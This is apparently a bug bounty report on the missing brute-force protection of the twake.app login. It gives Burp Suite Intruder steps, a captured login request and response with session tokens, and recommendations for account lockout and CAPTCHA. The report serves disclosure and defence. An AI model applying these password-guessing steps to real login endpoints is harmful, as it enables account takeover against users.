Issue Description

• A brute-force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until an attacker discover the one correct combination that works.

Steps to Reproduce:

'1. First capture login request with BurpSuite, and make sure to turn on the intercept before logging in, then send to Intruder Replay the login request.

'2. Next, turn off the burpsuite intercept, then go back in intruder under payload positions clear all the payloads highlighted and highlight the password value in the http request then hit add button to set the payload positions.

'3. Second, go to payloads tab, then load your password list.

'4. Lastly, hit the start attack button.

With a different password value utilizing a password list payload Should the password exist a "302 Found" code will be issued. On the other hand, unsuccessful attempts are returned with a "200 code " , but it gives an error message incorrect email & password.

HTTP Request:

POST /oauth2/authorize?client_id=twakeconsole&redirect_uri=https%3A%2F%2Fconsole.twake.app%2Foidccallback&response_type=code&scope=openid+profile+email+address+phone+offline_access&state=27c159fcf184453097e882b0f7137c7a&code_challenge=QPm6HAG3RNCOWPUOpoEONYaTPii0hN1o8ogh7IIEpk4&code_challenge_method=S256&response_mode=query HTTP/2
Host: auth.twake.app
Cookie: ajs_anonymous_id=47592364-2607-4d03-ac78-8d5b5a75ff7d; sticky-sso=http://10.2.3.26:80; llnglanguage=en
Content-Length: 129
Cache-Control: max-age=0
Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://auth.twake.app
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://auth.twake.app/oauth2/authorize?client_id=twakeconsole&redirect_uri=https%3A%2F%2Fconsole.twake.app%2Foidccallback&response_type=code&scope=openid+profile+email+address+phone+offline_access&state=27c159fcf184453097e882b0f7137c7a&code_challenge=QPm6HAG3RNCOWPUOpoEONYaTPii0hN1o8ogh7IIEpk4&code_challenge_method=S256&response_mode=query
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

url=aHR0cHM6Ly9hdXRoLnR3YWtlLmFwcC8vb2F1dGgy&timezone=8&skin=twakeconsole&user=researcher.intigriti%40gmail.com&password=password

HTTP Response:
HTTP/2 302 Found
Date: Sun, 19 Feb 2023 18:13:12 GMT
Location: https://console.twake.app/oidccallback?code=6fb482b02aaf5645c50452d8f524c54e&state=27c159fcf184453097e882b0f7137c7a&session_state=V9FTH4VCAmVnOLvrgNk0HUTfkZ2oh3ZVj7bL28vs24Y%3D.bzN6RGw5dUdGS1ROZGhOS2gvTEw5YkpWcmVKSmFmTzB5bXZIcmR2TmMwaVVjOXdnc1JaelRiVEV0ZitBemEvS1cxT0lLMHdSMFBVY0JLOFk4bHFoVEE9PQ
Server: nginx/1.14.2
Set-Cookie: lemonldap=19eda7a4402f83afb6b1fe62945de765; domain=.twake.app; path=/; SameSite=Lax
Content-Length: 0

Recommendation

• The most obvious way to block brute-force attacks is to simply lock out accounts after a defined number of incorrect password attempts. Account lockouts can last a specific duration, such as one hour, or the accounts could remain locked until manually unlocked by an administrator.

• Another way is to add CAPTHCHA in login form.

Impact

• This vulnerability could allow an attacker to brute-force others user account..